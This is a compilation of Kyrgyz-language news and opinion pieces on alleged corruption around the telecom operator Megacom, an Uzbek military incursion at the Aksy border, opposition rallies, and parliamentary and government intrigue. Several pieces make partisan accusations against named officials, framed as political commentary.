Ошондо президент Атамбаев интервью берди эле: «Абеков коррупционер, ал түрмөдө отуруш керек» деп. Мамлекет­тик репрессиялык аппарат бул сөздү буйрук катары кабыл алды. Сөзгө тартып, түшүндүрөюн десен эле: «Баарын билип турам, бирок, «биринчинин» жеке көзөмөлүндө, башымды алып салат» дешет. Эске салсак, 37-жылдары ушул эле чекисттер «биринчинин» көзөмөлүндөгү буйрук» деп туруп, Иса Ахунбаевди 2 жыл камаш- кан (кийин өздөрү  барып ошол кишинин колунан дартынан айыгышкан), Сергей Королев 5 жыл ГУЛАГда өткөргөн (кийин ал киши космоско биринчи ракетаны учурган), Аалы Токомбаев, Кожомкул баатыр… Де­геле койчу, баш көтөргндөрдун  баары… Ошол жылдардын тарыхынан эмнени билгим ке­лет? Касым Тыныстановдун, Төрөкул Айтматовдун, башкалардын атылып салынышынын чыныгы себеби эмнеде? Заман өзгөрдү, демократия, акыйкаттык… Контора болсо баягы эле контора. Жүрөгү менен чыны­гы чекист бирөө болсо, жанында отузу мансап кууп келген.
2011-жылы эстесеңер, А.Силич Мегакомдун кеңсесин бир суткага жакын убакыт басып алган. Ошондо А.Силичти кош- топ башкы прокуратура менен УКМК кызматкерлери келген. Ал эми Азамат Мурзалиевге ИИМ кызматкерлери колдоо көрсөткөн. Ал окуя К.Байболовдун (ошондо башкы проку­рор) иштен четтөөсү (отставкасы) жана А.Силичтин Кыргызстандан качып кетүүсү ме­нен бүткөн. Кийин 2012-жылы УКМК А.Мурзалиевди камакка алып, Азат Базаркуловду Мега­комдун баш мүдүрү кылат. Базаркулов 2010-жылы сырткы көзөмөлдөөчү болуп турганда Силичке кошулуп, Мегакомду эңшерткенине карабастан, аны кайра жетекчи кылып дайындашат. Кимдин крышасы ким экени түшүнүктүү  болдубу? Бул иштерде эч кандай кылмыштуулук менен күрөшүү жок, болгону Мегакомго таасир үчүн талаш.
Мегакомдун тегерегинде да­ты бир көңүл бура турган нерсе – «Кыргыз Мобайл Компани» (КМК). Ал 2012-жылы ошон­догу мамлекеттик байланыш агенттигин жетектеген А.Кадыркуловдун демилгеси менен түзүлөт. Ээси, мүлкү, каражаты, эч нерсеси жок фирмага лицензиялар менен жыштыктар берилет. Бул канчалык мыйзамдуу? Башка бир бечара да лицензия сурап барса береби? Андай лицензиялоонун кереги эмне? Мейли лицензия ме­нен жыштыкты берди. Андан соц ММБФ «Кыргызмобайл компанини” үч жолу саттыкка коет. Бир дагы кардар келбейт.
«Казакстандан инвестиция тартабыз» деп, Самрук-Казынага сунуш кылат. Кызыкпайт. Эмнеге? Себеби, КМКга бөлүнгөн  жыштыктар жарыбаган оокат, аты эле бар. Анча жыштык менен бизнес кылуу мүмкүн эмес. Анын үстүнө сураган баасы асманды тирейт. Кийин А.Кадыркулов ММБФке же­текчи болуп дайындалат. Өзү баштаган КМКдан кутулуунун бирден-бир жолу  Мегаком­го сатып жиберүү. Ошентип, 2015-жылдын 30-июнь күнү Мегаком КМКнын 75% 517,7 миллион сомго сатып алат. Ойлогулачы, эркин базарда башкалар бир сом бербеген нерсени жарым миллиардга сатып алат деген эмне? Ошол сумманын ичинде Кыргызтелекомго 200 миллион, ал эми ММБФ өзүнө 14,7 миллион сом түшүрөт. Баары жыргады, бирок, ошондон кийин Мегаком баш көтөргүс абалда калды. Ошен­тип, бийлик Мегакомдун түбүнө  жетти. Сүйүнчүсүнө ММБФ Мегакомдун жетекчилигине сыйлык ыйгарды. Мактоо грамотасына: «Биргелешкен тапшырмаларды ишке ийгиликтүү ашырганы  үчүн…» Ал эмне де­ген сырдуу биргелешкен тапшырмалар? Эгер ММБФ «кирешени көбөйткөндүгү үчүн » деп сыйлык берсе түшүнөт элем. Ал эми бул жерде коопсуздукту камсыздоо кызматкерлери менен ММБФтин эмне сырдуу иштери бар?
Эгер ММБФ башка мамле­кеттик ишканаларды да ушинтип жетектеп жатса, анда күнүбүздүн бүткөнү ушул. КМКны сатып алгандан кийин көп узабай парламентте А. Базаркулов аны иштетүүгө каражат жоктугун айтып чыкты.
МКны иштетүүгө акчаң болбосо, 500 миллионго сатып алып эмне кыласың? Бир аялды бага албай туруп, үчүнчүсүн  алып эмне? Темир Сариев Мегакомду сатуу үчүн ушуну менен үч жолу парламенттин уруксатын алды. Алгачкы эки жолу аукцион болбой калды. Би­рок, мамлекеттик бюджетке дээрлик 17 миллион сом зыян келтирди. Кантип? Оңой эле: «Мегакомдун 49 пайызын сатпасак болбой калды» деп парламентке барат. Депутаттарды ары-бери чайкап, алардын макулдугун алат. Ал­дан соң, ошол 49 пайызды баалоо учун All-Star жана Эрнст энд Янг компанияларына эки жолу, бардыгы 16 887 850 сом төлөйт. Бирок, Мегакомду сатпайт. Эмнеге сатпайт? Себеби, андай сатуу мыйзамсыз. Эч ким сатып албайт. Са­туу мыйзамсыз экенин билип туруп, эмне үчүн Т.Сариев парламентте аны айтпайт? Эгер депутаттар мыйзам бузуу бар экенин билсе, анда макулдук берет беле? Мындай иш эки катар болуп өттү. Шылуундукка окшобойбу? Акыркы, үчүнчү жолу сатыкка коюлушу да канчалык мыйзамдуу экенине кепилдик жок. Бирок, парламент мкулдугун берген, кербен жыла берет. Бүгүнкү депутаттардан сурасаң «биз эмес башкы прокуратура карап, «эч кандай кылмыш жок» деген бүтүмгө келди. Мамлекеттик бюджет 17 миллион сом чыгашага учураса да «кылмыш жок». Ошол эле мезгилде 3000 сом чыгаша үчүн «кор­рупция» деп баса калышат. Бу кандай?
Жакында бийлик төбөлдөрү «Мегакомдун сатылышынан түшкөн акчага жол оңдойбуз» деп жар салды. Албетте, бирден-бир иштеп турган мекемени сатып, акчаны асфальт менен комуп койгондон артык кандай ой болсун? Кийин топурак казып, ал акчаны издеп көр.
Ошентип, өзүңөр байкагандай, Мегакомдун бүгүнкү аянычтуу абалына бийлик бир катар жылдардан бери системалуу каталык кетирүү менен кел­ди. Бул процесс баш аламандык менен болдубу же бирөө  атайлап ушул абалга алып келдиби? Билбейм. Чуулгандуу иш менен кимдердин аты чыкканын айтып бердим. Көп нерсени мен да билбейм.
Болору болду. Бирөөнүн артынан чукуламай – ал тергөөчүлөрдүн иши. Мени келечек ойлонтот. Сатуу керекпи же жокпу? Кандай кылсак эртеңки күнү өкүнбөйбүз? Мегакомдун бугүнкү каржылык абалын эске алсак, маселени чечмелөө өтө оор. Бирок, кандай болгондо да, эгер мен чечим кабыл алсам, саттырмак эмесмин. Сатып жиберүү – бул өнүгүү жолу эмес. Ата ка­тары балдарымдын эсинде мародер- коммерсант болбой, новатор, куруучу, прогрессивдүү адам катары калгым келет. Андыктан, негизине чейин урап калса да, кайра куруп, жандандыруу туура иш. Албетте, колуңан башка эч нерсе келбесе, башты оорутпай сатып жиберген туурабы? Эл жакшылары, оюңарды айткылачы?
Адис каатары айтарым: Мегакомдун ендүрүштүк, инновациялык потенциа­лы абдан зор. Мен аны ичинен билем. Өзүнүн инвестициялык долбоорлорун Мегаком өзү эле каржылай алат. Болгону жетекчиликке кесипкей адамды дайындоо керек. Анан да бийлик жок дегенде бир нече жыл Мегакомдун канын соргонду токтотушу керек. Кан сорбосо,өзү эле оңолуп кетет.
Мегакомдун аркасы менен бир катар улуттук деңгээлде маанилүү долбоорлорду ишке ашырса болот. Мисалы: Санарип телеберүүсүнө өтүү. Бул долбоорду Мегаком бир кыйла жогорку сапатта ишке ашыра алмак (Кыргыз- телекомго караганда), себеби, адистери да, каражаттары да бар. Дүйнөлүк тренд ошондой. Азыр операторлор жалаң гана телефон байланыш менен чектелбестен, мульти-кызматтык тармактарды курууда. Анда үн, смс, ммс, интернет, радио, телеберүү… Баардык кызматтар бир тармакгын ичине камтылган. Бизде болсо же санарип жок, же Мегакому жок.Телемедицина. Сыналгы же уюлдук телефон аркылуу медициналык кызмат көрсөтүү актуалдуу маселе эмеспи?
Алиппе ТВ долбоорун улантып, телекоммуникация технологоиялары аркылуу билим берүүнү өркүндөтүү. Кайтарым байланыш, интерактив, муль­тимедиа, онлайн баалоо, адаттык билим берүү менен тыгыз интеграция болмоюн Алиппе ТВ толук кандуу ийгиликтүү  боло албайт. Бирок, долбоор ойдогудай ишке ашса, анан көрүп ал, Кыргызстандагы билим берүү системасына алдыңкы өлкөлөр суктанат. Билимдүү жана маданияттуу ке­лечек муун. Биздин максат ушубу же асфальтпы?
Мегакомдун негизинде DVB-MRC технологиясын өздөштүрүү. Татаал нерсе, эки сөз менен түшундүрүү кыйын, ал үчүн өзүнчө макала жазайын. Бирок, жыйынтыгында телеберүү түпр, тамырынан бери өзгөрөт. Мисалы, түз ободо өз оюн билдирүү үчүн телефон чалуу же СМСтин кереги жок. Колуңуздагы пульттун кызыл же жашыл тайпасын  басып коюу жетиштүү. «Ала- Тоо» профаммасы учурунда кайсы бир жаңылык жакса же жакпаса «лайк» же «дислайк» билдирсеңиз болот. Ап статистика түз ободо экранга чыгат. Ошондо калың эл ез оюн митингге чыкпай эле үйдө отуруп, сыналгы аркылуу билдирсе болот.
Анан да, бош убакта нарындык ак­сакал баткендик курдашы менен сы­налгы аркылуу шахмат ойносо болот. Укмуштай көрүнөбү? Инновациялык технология деген ушу.
Эки жол бар: Мегакомду сатып жиберсе болот, же ушул байлыкты акыл менен пайдаланып, инновациялык жол менен өнүксөк болот. Эмне кылалы?
Булак: “АЗИЯньюс”
 
Көзү азиз кыргыз кыз Жапонияда биринчиликти алды

Жапониянын баш калаасы Токиодо Nodojiman the world аттуу эл аралык сынакта кыргызстандык көзү азиз ырчы Гүлүм Касымбаева баш байгеге ээ болду.

Бул сынакта 10 өлкөнүн ырчылары жапон тилинде ырларды аткарышты.  Бир нече этаптан турган сынакта Гүлүм Касымбаева улуттук кыргыз кийимдерин кийип чыккан жана жапон тилинде ырдаган. Ыр жарышка Америка, Германия, Аргентина, Мексика, Канада, Франция ж.б. өлкөлөрдүн өнөрпоздору катышты.

Булак: “Жаңы Агым”

Бийлик тараптан кадам болбосо, Аксы эли чек араны коргоого чыгышат

18-март таңкы саат 7:40тар чамасында Өзбек аскерлери Аксы районунун Сары-Булак участкасына оор аскер техникалары менен бастырып киришкен. 14 саатка чукулдаган убакыттан бери район акиминен башка жогорку бийликтегилер тараптан эч кандай аракеттер көрүлбөгөндүгүнө байланыштуу Аксы эли чек араны коргоону өз колдоруна алууга даярданышууда.Мындай маалыматты Кашка-Суу айыл аймагынын айылдык кеңешинин төрагасы Аскарбек Давлетов жергиликтүү кабарчыбызга билдирген.
Берилген маалыматка ылайык, таңга жуук кирип келген Өзбек аскерлерин тийиштүү органдар байкаган эмес.
“Жергиликтүү тургундар, райондогу бүтүндөй айыл өкмөттөрдүн жашоочулары “бийлик тараптан болгон аракетти 2 күн күтөбүз,болбосо чек араны коргоого өзүбүз чыгабыз”,-деп жатышат. Ал эми Өзбек тарап кимдир бирөө катуурак үн катчудай болсо атып салчудай абалдар турушат. Ошондуктан эл кырылып калбасын деп, араңдан кармап турабыз”,-деп билдирген А. Давлетов.
Ошол эле учурда Аксы районунун жаш активисти Эмил Алимов, “Чек ара маселесин тез арада чечүүнү бийликтен талап кылабыз. Болбосо биз жаштар чек арага өзүбүз барып турабыз”,-деп билдирген.
Жергиликтүүлөрдүн берген маалыматына таянсак, Өзбек аскерлери катуу куралданышкан жана оор аскер техникалары менен турушат. Ал эми кыргыз аскерлеринин колунда жөнөкөй гана автоматтар бар. Андан сырткары, облус жетекчилери же болбосо облустагы күч түзүмдөрү, ал тургай улуттук коопсуздук кызматынан да эч ким барбаганын айтышып, кечке жуук губернатордун орун басары Бактыбек Анаркулов барганын кошумчалашты.
Ал эми Өкмөттүн Жалал-Абаддагы өкүлүнүн орун басары Аксы элине түшүндүрүү иштери жүргүзүлүп жатканын билдирип, учурда абал тынч экенин маалымдады.

Санрабия САТЫБАЛДИЕВА

Булак: “Аймак”

Чыныбай Турсунбеков чыйпылыктап, өкмөт башчы болууга жан үрөөдө

Соңку бир айдан берки маал-маалы менен болуп келе жаткан кадрдык өзгөрүүлөрдүн топтому өкмөттүн апрель айына күтүлүп жаткан отставкасы менен токтоору каңкууланууда. «Запастагы премьерлерден» азырынча Чыныбай Турсунбеков менен Канат Исаевдин шансы жогорулап жаткандыгы, спикерликти түштүк кланы мыкчып турган соң, өкмөт башчылык түндүктүк кадрларга ыролоноору КСДП ичинде катуу сөзгө айланууда. Бу Чыныбай соңку кезде түндүктүк кадрларды кызматка коюу жагынан таасири артып, ажого түз кирүү менен тылын бекемдеп алгандыгы, бир кездеги жардамчысын жакында Нарынга губернатор орун басарлыгына алып барса, Мегакомду башкарып, миллиондор боюнча айыпталган Азамат Мурзалиевди кеңешчи кылып алгандыгы кандай? Ооматы арткан эргул азырынча бар иштерге башын сала берсин, убагы келгенде баардык кылыгы үчүн катуу жооп береби?..

Канжар БОРПОШОВ

Булак: “АЗИЯньюс”

Абдышарип Бекилов, журналист: "Өзбекстан басып алган жер жана жол талашсыз эле кыргыз жери"

Мен Аксы районунун Кашка-Суу айыл аймагынын Өлөң-Булак айылынан боломун. Ал эми Өзбекстан басып алган жер Кашка-Суу айыл аймагындагы Сары-Булак участкасы деп аталат. Биздин айылдын жашоочуларынын үлүш жерлери, чөп жайыт жерлери, мал сарайлары бар ал жерде. Ал эми Кербен-Ала-Бука унаа жолу Жалал-Абад облусуна Кубанычбек Жумалиев губернатор юолуп турганда 22 чакырым болуп салынып, Жумалиевдин жолу деп да аталып жүргөн. Ал жолду эмнеге салган? Бул жол курулганга чейин Кыргыстандын Ала-Бука, Чаткал райондорунун эли Өзбекстандын Нанай, Могол деген айылдары аркылуу облус жана Республиканын борборуна каттап жүрүшкөн. Өзбекстан бийлиги өткөрмө постторду куруп, текшерүүлөрдү күчөтүп, жолдорду казып, кыргыздарды азапка салгандан кийин 22 чакырым келген Кербен-Ала-Бука айланма таш жолу салынган. Кийин шайлоолордун шарапаты менен ал жол асфальтталган. Кыргыздар ээн-эркин жүрүп калышкан, ал эле эмес, Кыргызстандын чек ара кызматынын аскерлери азыркы Өзбекстан тосуп алган жерлерди кайтарууга алып жүрүшкөн. Өткөн жылы Өзбекстандын жарандары жолго чейин чыгышып, жолдон өтүп бара жаткан Кыргызстандын унааларын ташбараңга алышып, талкалашкан. Кыргыз тараптын реакциясынан кийин, тынчып калышкан. Өзбек бийлиги унаа жолго жакын жайгашкан турак жайларды бузуп, элин көчүрүп кетип, ошол аймак нейтралдык аймак катары калган. Эми Аксы районунун акими Медет Айдаралиевдин “Азаттык” радиосуна “Чала-Сарт” деген талаштуу аймакта ушундай окуя болду дегени карандай калп, элдин башын айландыруу. Чала-Сарт деген айыл Өзбекстандын айылы, тээ Акаев Президент кезинде Аскар Акаевге бизди Кыргызстанга эле өткөрүп албайсызбы, кыргыз мектебибиз да жок кыйналып, өзбектешип кетмей болдук маанисинде кат жаза коюшуп, анысы Өзбек Президенти Каримовдун колуна тийип, жылдап пенсия, пособий албай кор болуп, акыры өзбектешип кетишти. Көпчүлүгү Кыргызстанга көчүп чыгып кеткен Өзбекстандын айылы болуп эсептелет. Элдин башын айландырып, Чала-Сарт айылында дегени такыр туура эмес. Ал эми Кыргызстандын Чек ара кызматы Могол айылы дегени андан да туура эмес, Могол айылы окуя болгон жерден 10-15 чакырым алыстыкта жайгашкан Кыргыз мектеби бар, жалаң кыргыздар жашаган Өзбекстандын айылы болуп эсептелет. Союз жаңы таркаганда Могол айылы талашка түшүп, Өзбек бийлиги Могол айылынын 5-6 аксакалын акчага сатып алып, ошолордун оюн угалы, алар кандай айтышса, маселени ошондой чечебиз деген шарт коюшкан экен. Ошентип акчага сатылган аксакалдардын сөзү менен 100% кыргыздар жашаган Могол айылы Өзбекстанга карап калган дешип, бүгүнкү күндө Моголдуктар ошол аксакалдарды сөгүп жүрүшөт экен. Дагы бир жолу баса белгилеп айтамын, Өзбекстан басып алган Кербен-Ала-Бука жолунун Сары-Булак участкасы болуп эсептелет. Өзбекстандын айылдарында жашаган кыргыздар жыл сайын Кыргыздардан суранышып, малдарын ошол Сары-Булак айылына жайып да кетишчү, акыркы 10 жылда Кыргыз Чек арачылары алардын малдарын такыр киргизбей калган. Өми ошол жерди Өзбекстандын көксөп турганы акылга сыйгыс көрүнүш болууда.
Бул маалыматтарды массалык маалымат каражаттарынын кызматкерлери, журналисттер үчүн тактоо катары атайын жазып жатамын, Балким кереги тийип калаар.
Абдышарип Бекилов, журналист

Ажого каршы чыккан Жакупованы президенттик аппарат көтөрмөлөйбү?

Ушул тапта Жогорку Кеңеште вице-спикерлик орунга ат салышуу кызык маанайда уланганы туру. Бакыт Есенбаеванын бошогон ордуна парламентгеги «Бир Бол» фракциясы бөксөлүктү толтуруу үчүн Чолпон Жакупованы сүрөсө, Бабановдун командасы Алтынай Өмүрбекованы (депутат Руслан Казакбаевдин келини) таптоодо. Аксарайдагы соңку күбүр-шыбырларга  караганда, вице-спикерлик орунга ажонун айланасы Чолпон айым үчүн «бата бергени», аппараттан колдоо тапкан Жакупова жакында бул орунга мыктай сайылары кеп болууда. Депутаттыкка дейре Алмаз Шаршеновичке  үстөккө-босток сын-пикирин жаадырып келген Чолпон айымга Акүй төбөлдөрү анча не «жибип» кетишти болду экен? Же адилеттүү сынды кектешпей, бийик болууга кадам таштаган кербездериби?

Булак: “АЗИЯньюс”

Жаз кыргыз оппозициясына жан киргизди... Кулматов президенттике ат салышабы?

24-мартта Кыргызстанда курултай өтөөрү маалымдалды. Бул иш-чараны оппозиция өткөрүп, электр энергиясына тарифтер, турак-жайга коопсуздандыруу киргизилиши тууралуу айтылмакчы. Ошто өтчү курултайга Равшан Жээнбеков, Адахан Мадумаров, Камчыбек Ташиев, Ахматбек Келдибеков  өндүү дасыккан кыргыз оппозиционерлери чогулушат. Курултайды уюштурган  буга чейинки эки төңкөрүштүн эң көрүнүктүү, тажырыйбалуу катышуучуларынын бири Азимбек Бекназаров.

Ошондой эле оппозициянын бүткүл өлкө боюнча нааразылык акцияларынын сериясын өткөрүү ниети айтылууда. 14-мартта өлкөнүнүн Түштүгүндө Жалал- Абадда митинг өттү. Аянтка 100 адам чогулуп, алардын алдында облустун мурдагы губернатору, азыр оппозицияда жүргөн саясатчы Бектур Асанов сөз сүйлөдү. Экс-чиновник Ошто бүткүл элдик курултай өтөөрүн маалымдап, Кыргызстандын прези­денти Алмаз Атамбаевдин «отставкага кетип калганга 10 күнү бар экендигин» билдирди. «Эгер антпесе, мыйзамдуу жол менен кетиребиз» деди Б.Асанов.

«Мыйзамдуу жол» эмнени билдирерин саясатчы түшүндүргөн жок, бирок, буга таң калбаса деле болот. Кыргызстандын оппозициялык саясатчыларынын өздөрүнө көңүл бурдуруш үчүн кээде катуу, эч нерсе менен бекемделбеген билдирүүлөрдү жасай бермейлери бар.

Кыргыз оппозиционерлеринин планында эч кандай жаңы деле нерсе жок. Нааразылык акцияларын өткөрүү ниетин алар ар жаз, күз сайын билдиришет. Бул пландар иш жүзүнө ар кандай ашып келатат. Алар­дын бир бөлүгү үзгүлттүккө  учурап, акыркы жылдары митингдер деле болбой калды. Бирок, 2005-2010-жылдары нааразы­лык ийгиликтүү ишке ашып калган да жайы бар. Аламандын кысымынан, жергиликтүү элитанын бир бөлүгүнүн тымызын сүйлөшүүлөрүнүн жана күч түзүмдөрүнүн чыккынчылыгынын айынан   айынан Кыргызстандын эки президенти – Аскар Акаев менен Курманбек Бакиев бийлигинен кол жууп калышкан.

Акциянын уюштуруучулары салыктардын өсүшүн, кошумча төлөмдөрдүн киргизилишин, ошондой эле жалпы жонунан өкмөт менен президенттен натыйжасыз иштегенин сынга алуу менен нааразылык потенциалын мобилизациялоого аракет кылышат. Идеологиялык, же тышкы саясый мүнөзгө талаптар азырынча коюла элек.

Эгер акыркы жылдардагы кырдаалды талдап көрчү болсок, «азыркы атмосферада өлкөдө оппозиционерлер үчүн жагымдуу шарт түзүлгөн» деп тыянак чыгарууга болот – баалардын жана тарифтердин өсүүсү, жаңы салыктардын жана төлөмдөрдүн киргизилиши, элдин турмуш деңгээлинин начарлашы, бийлик тарабынан акыркы жылдарда берилген убадалардын аткарылбаганы оппозициянын чырагына май тамызат. Каржы агымдарынын азаюсу да чоң ролду ойнойт – калктын буга чейин ити чөп жеп, бийликке лоялдуу болуп келишкен топтору азыр өз кирешелерин жоготуп коюшту, азыр алар да мамлекет башчысынын душмандарынын катарына өтүп кетүүлөрү мүмкүн. 2017-жылдын күзүнө белгиленген президенттик шайлоолордун жакындап келатканы да кандайдыр бир ролду ойнойт.

Оппозициянын демилгеси чиновниктер арасында тынчсызданууну пайда кылды. «Коомчу- луктун нааразычылыгы» сыяктуу бир катар профилактикалык иш-чаралар көрүлдү. Мисалы, 14-мартта Кербен шаарынын жашоочулары анти- митингте чыгышып, «өлкөдөгү коомдук-саясый турмушту туруксуздаштырууга багытталган ар кандай нааразычылык ак­цияларын токтотууну» талап кылышты.

Ушундай кырдаалда бийлик калкка булчуңу менен чечкиндүүлүгүн көрсөтпөстөн, проблемаларды чечүүгө жөндөмдүүлүгүн, жарандардын турмушун жакшы жагына өзгөртө алаарын да көрсөтүшү керек. ЕАЭСке кирген Кыргызстанды колдоо үчүн  Россия Федерациясы каржылаган кыргыз-орус өнүктүрүү фондусу экономиканы жандандыруунун инструменттеринин бири болууга тийиш болчу. Бирок, иш жүзүндө фондунун иши анчалык жакшы болуп чыкпады. Дооматты эки тарапка тең Россияга да, Кыргызстанга да койсо болот. Бул түзүмдүн ишинин натыйжалуулугу узак мөөнөт бою сынга алынган соң, фондунун башкармалыгынын төрагасы алмашты. Нурсулуу Ахмедованын ордуна Бишкектан экс-мэри Кубанычбек Кулматов дайындалды. Бул эки жетекчи тең-эскиси да, жаңысы да президент Атамбаевге жакын адамдар. Кулматовдун дайындалышы -анын Москвадагы байланыштарына байланыштуу болушу да  мүмкүн. Анын атасы, белгилүү дипло­мат Кеңеш Кулматов 1997-жылдан бери Россиянын ТИМнин дипломатиялык академиясында проректор болуп иштеп ке­латат. Бишкектеги эксперттик чөйрөдө «Кулматов 2017-жылкы шайлоодо президенттикке талапкерлердин бири болуп калышы мүмкүн» деген сөздөр айтылууда.

Григорий МИХАЙЛОВ, «Независимая Газета»

Булак: “АЗИЯньюс”

Жанарбек Надырбеков, Аксы райондук жергиликтүү кеңештин депутаты: “Өзбек чек арачылары “Бизнинг худудимизга хуш келибсиз”(биздин аймакка кош келиңиздер) деп текшерүүнү улантып жатат”

“Кечээ, 18-мартта Ала-Бука районундагы Могол аймагында кыргыз-өзбек чек арасындагы тактала элек аймакка Өзбекстандын аскер кызматкерлери кетишел элек. Алар кыргыз жарандарын текшерүүнү улантып жатышат” – деп билдирди бүгүн, 19-мартта kyrgyztoday.kg маалымат агенттигине Аксы райондук жергиликтүү кеңештин депутаты Жанарбек Надырбеков.

“Алар  2 БТР жана 2 КАМаЗ унаасы дагы ошол боюнча турат. Кыргызстан тараптан дагы 2 БТР барды. Коопсуздук көзөмөлгө алынганы менен жергиликтүү тургундардын кыжырдануусу күчөтүп атат. Жергиликтүу бийлик, азырынча жергиликтүү тургундарды сабырдуулукка жана стабилдүүлүккө чакырып жатат. Бийлик тарабынан расмий түрдөө сүйлөшүүлөр жүрүп жатат дегени менен, Атамбаев же Темир Сариев тарабынан эч кандай үн-сөз чыга элек. Жолдорго тосмолорду коюп алган өзбек чек арачылары “Бизнинг худудимизга хуш келибсиз”(биздин аймакка кош келиңиздер) деп текшерүүнү улантып жатат.”- деп билдирди жергиликтүү депутат.

Ал эми бул боюнча Кыргызстандын чек ара кызматкерлери чек арадагы соңку аракеттер боюнча сүйлөшүүлөрдү жүргүзүп, элди тынчтыкка чакырууда. Аны менен бирге кыргызстандыктарды Өзбекстанга барууга тыюу салып жаткандыгын КР чек ара кызматынан Сажира Чоколоева билдирди. Абалды жөнгө салуу үчүн Чек ара кызматынын башчысынын орун басары, полковник Таалайбек Усубалиев  бүгүн, 19-мартта  аталган аймакка барды. Ушул таптарда Кыргызстандын чек арачылары Өзбекстандын аскер күчтөрү кирип келген аймакты күчөтүлүп, кыргыз-өзбек чегиндеги өткөрмө бекеттер жабык бойдон турат деп кошумчалады.

Гүлжан Шерипбаева, Кyrgyztoday.kg

Турсунбек Акун бийлик менен оппозицияга арачы... Атамбаев оппозияны тоготпойбу?

Өлкөдө түзулгөн соңку олку-солку саясый кырдаал, бийлик менен оппозициянын тиреши күн сайын кырды-бычак абалга кептелип, эки тараптын эрегиши жакшы аяктачудай эмес. Кырдаал- дын курчуп баратканынан «жыт алган» укук коргоочу Турсунбек Акун оппозициянын Оштогу курултайынан соң 30-мартта бий­лик менен ага каршы жээктерди ай-тегерек столго чакырып, сүйлөшүү, жолугуштуруу жараянын кылууга жан үрөп чыкты. Албетте, буга оппозиция тарап макул болоору мүмкүн.

А бийликчи? Кезегинде Алмаз Шаршенович журналисттердин оппозиция менен жолугушууга баруу тууралуу соболуна «мен эмне Бекназаров же Турсунбек Акун, Нурлан Мотуев менен жолугушушум керекпи?» деп берген жообун эске алсак, анда Тукеңдин жыйынынан деле «толк» чыкпайт көрүнөт. Анан калса, Тукең бир аз убакытка публикадан тыныгуу ала түшсө эле саясый рейтингин көтөрүү максатында ишке ашпаган пландарды көтөрүп чыкканга маш болуп буткөн жалганбы? Аттиң, 60 жашка таяган саясатчыларыбызга неберелеринин кашында эле тынч карылык берсе не?

Канжар Борпошов

Булак: “АЗИЯньюс”

Канат Исаев Өкмөттүн аферасын ачыкка чыгарды... Өкмөт үйүндөгү былык

Буга чейин жол куруу жаатында афералык иштер болуп атканы, буга өкмөттүн тиешеси бар экени айтылып келген. Эми бул боюнча так маалымат чыгып, коомчулуктун оозун ачыргандай эле болду.
Балыкчы-Корумду унаа жолун оңдоо боюнча 2015-жылдын ок­тябрь айында тендер өткөн. Бо­луп өткөн тендердин жүрушүндө  одоно мыйзам бузуу фактылары аныкталгандыгын Жогорку Кеңештин депутаттары тарабынан түзүлгөн  комиссия да аныктаган. Эл өкүлдөрүнөн  куралган комиссияны түзүүгө парламенттеги «Кыргызстан» фракциясынын лидери, депутат Канатбек Исаев башкы демилгечи болгон жайы бар. Октябрь айында өткөрүлгөн убакта тендерди юстиция органынан каттоодон өтпөгөн фирма утуп, качан гана тендерди утуп алган соң, ноябрь айында гана атайын органдардан каттоодон өтүп, декабрь айында гана жол курууга 3-даражадагы лицензия алган. Бул эмнеси? Негизи мындай жолду курууга 2ден кем эмес даражадагы лицензия керек болмок. Ал эми 3-даражадагы лицен­зия жолдун тешиктерин жамап- жаскоого гана берилет. Кызыгы, бүгүн дагы эл аралык деңгээлдеги аталган жолду тийиштүү лицензиясы жок Кытай фирмасы куруп келе жаткандыгы кандай? Баарынан кызыгы, өзүбүздүн  атамекендик фирмалар 1 миллиард 200 миллион сомго арзан жол куруу сунуш кылганына карабастан, 1 миллиард 200 миллион сом кымбат берген Кытайдын фирмасы утту деген тендердик комиссиянын мүчөлөрү чечим кабыл алышкан. Муну менен мамлекетке канча чыгым келтирилди? Казынабыз миң жеринен жамаачы болгон шартта ушундай мыйзамсыздыктарга Канат Исаевден башка бийлик органдары чара көрбөйбү?
Ток этери, иттин өлүгү кайда көмүлгөн? Тендер өткөрүү ме­нен лицензия чырын сүрүштүрүп отурсаң, жандырмагы өкмөт башчыга жабышат экен. Натыйжада, иликтөө органдары дагы тереңдетип казса, бул боюнча башкы жоопкерчиликти Темир Сариев тарта тургандыгы, мамлекеттик деңгээлдеги чоң чатакка айланары байкалды. Дал ушул алешемдик, катачылыктын айынан өкмөт отставкага кетеби?..
 
Кубат Карачев
Булак: “АЗИЯньюс”

Өмүрбек Бабановдун таянганы кылмыш дүйнөсүбү?

Буга чейин «Республика – Ата Журттун» айланасына капчыктуу адамдардын арбын чогулганы, парламенттик шайлоодо акчанын күчүнө салуу менен жеңишке жетишкенин байкаганбыз. Бирок, Ө.Бабановдун командасындагылар таза эмгек менен байыган адамдарбы? Албетте, бул жаатта кыйла шектенүүлөр жаралат. Негизинен партия лидери чоң саясатта жаңычыл идеяларга таянуунун ордуна куру убадалар менен «курсак тойгузуп» келгени жашыруун эмес. Анан дагы акчага, кара күчкө ыктаганы байкалат. Мындай жүрүш менен элдин ишенимин актоо өтө эле кыйын го? Эмесе, биз саясатыбыздагы мыйзамдуулук жана тазалык болуш үчүн маселе көтөрүп, «Республика – Ата Журт» партиясындагы айрым фигуранттардын күңүрт жүздөрүнө токтоло кетелик.

Парламенттеги коалициялык көпчүлүктүн жыйынында «Кыргызстан» фракциясынын төрагасы Канатбек Исаев соттолгон, кылмыштуу топко тишелүү адамдар мамлекеттик башкаруу органдарына, жетекчилик кызматтарга барган учурлары боюнча билдирүү кылып, өлкө коопсуздугуна коркунуч туулганына кабатырланды. Эске салсак, буга чейин бир эмес, эки ирет соттолгондор аким болгону боюнча да ызы-чуу чыккан. Ошондой эле уюшкан кылмыш­туу топтордун мүчөлөрү парламентке чейин келип, мандат алганы боюнча да көптөгөн сын-пикирлер айтылып келген.

Фракция лидери Канат Исаевдин бул сөзүнөн  кийин өкмөт башчы Темир Сариев кайсы бир аткаминер кылмыштуу топко тиешеси болсо, же сотголгонун жаап-жашырган учурлар аныкталса, чара көрүлөрүн эскертти: «Сизде конкреттүү факт болсо, берип койсоңуз, биз териштирип, чара көрүп туруп, сизге жообун берели. Мындай болбошу керек. Анткени, коопсуздук эң негизги маселелердин бири» деп.

